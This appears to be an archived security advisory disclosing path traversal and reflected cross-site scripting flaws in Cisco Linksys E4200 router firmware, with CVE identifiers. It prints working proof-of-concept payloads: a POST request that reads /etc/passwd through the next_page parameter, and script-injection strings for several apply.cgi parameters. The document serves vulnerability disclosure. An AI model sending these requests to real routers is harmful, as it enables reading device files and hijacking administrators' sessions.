what you don't know can hurt you

Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion

Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion
Posted May 7, 2013
Authored by sqlhacker

Cisco Linksys E4200 firmware suffers from cross site scripting and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion
systems | cisco
advisories | CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684
MD5 | 97db9ffc803e72b8c6f25adb23f46b58

Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=============================================

XSS, LFI in Cisco, Linksys E4200 Firmware

=============================================

URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html

=============================================


January 30, 2013

=============================================

Keywords

=============================================

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,
Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp

CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,
CVE-2013-2683, CVE-2013-2684

=============================================

Summary

Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router
Firmware Version: 1.0.05 build 7 were discovered by our Researchers in
January 2013 and finally acknowledged by Linksys in April 2013. The Vendor
is unable to Patch the Vulnerability in a reasonable timeframe. This
document will introduce and discuss the vulnerability and provide
Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version
1.10 Released on July 9, 2012, and prior versions.

=============================================

Overview

Linksys is a brand of home and small office networking products and a
company founded in 1988, which was acquired by Cisco Systems in 2003. In
2013, as part of its push away from the consumer market, Cisco sold their
home networking division and Linksys to Belkin. Former Linksys products are
now branded as Linksys by Cisco.



Products currently and previously sold under the Linksys brand name include
broadband and wireless routers, consumer and small business grade Ethernet
switching, VoIP equipment, wireless internet video camera, AV products,
network storage systems, and other products.



Linksys products were widely available in North America off-the-shelf from
both consumer electronics stores (CompUSA and Best Buy), internet
retailers, and big-box retail stores (WalMart). Linksys' significant
competition as an independent networking firm were D-Link and NetGear, the
latter for a time being a brand of Cisco competitor Nortel.

=============================================

Vendor Software Fingerprint

=============================================

# Copyright (C) 2009, CyberTAN Corporation

# All Rights Reserved.

#

# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF
ANY

# KIND, EXPRESS OR IMPLIED, BY STATUTE.....

=============================================

The PoC's

=============================================

LFI PoC

=============================================

POST /storage/apply.cgi HTTP/1.1

HOST: my.vunerable.e4500.firmware

submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila
_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd

=============================================

XSS PoC

=============================================

/apply.cgi [log_type parameter]

/apply.cgi [ping_ip parameter]

/apply.cgi [ping_size parameter]

/apply.cgi [submit_type parameter]

/apply.cgi [traceroute_ip parameter]

/storage/apply.cgi [new_workgroup parameter]

/storage/apply.cgi [submit_button parameter]

=============================================

POST /apply.cgi HTTP/1.1

�..

change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t
ype=&log_type=ilog14568"%3balert(1)//482

=============================================

Other XSS PoC�s

=============================================

&ping_ip='><script>alert(1)</script>

&ping_size='><script>alert(1)</script>

&submit_type=start_traceroute'%3balert(1)//

&traceroute_ip=a.b.c.d"><script>alert(1)</script>

=============================================

CVE Information

=============================================

File path traversal CVE-2013-2678

Cross-site scripting (reflected) CVE-2013-2679

Cleartext submission of password CVE-2013-2680

Password field with autocomplete enabled CVE-2013-2681

Frameable response (Clickjacking) CVE-2013-2682

Private IP addresses disclosed CVE-2013-2683

HTML does not specify charset CVE-2013-2684

CVSS Version 2 Score = 4.5

=============================================

END

=============================================

-----BEGIN PGP SIGNATURE-----
Version: 10.2.0.2526

wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser
M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG
uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy
ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy
7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI
V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==
=w123
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close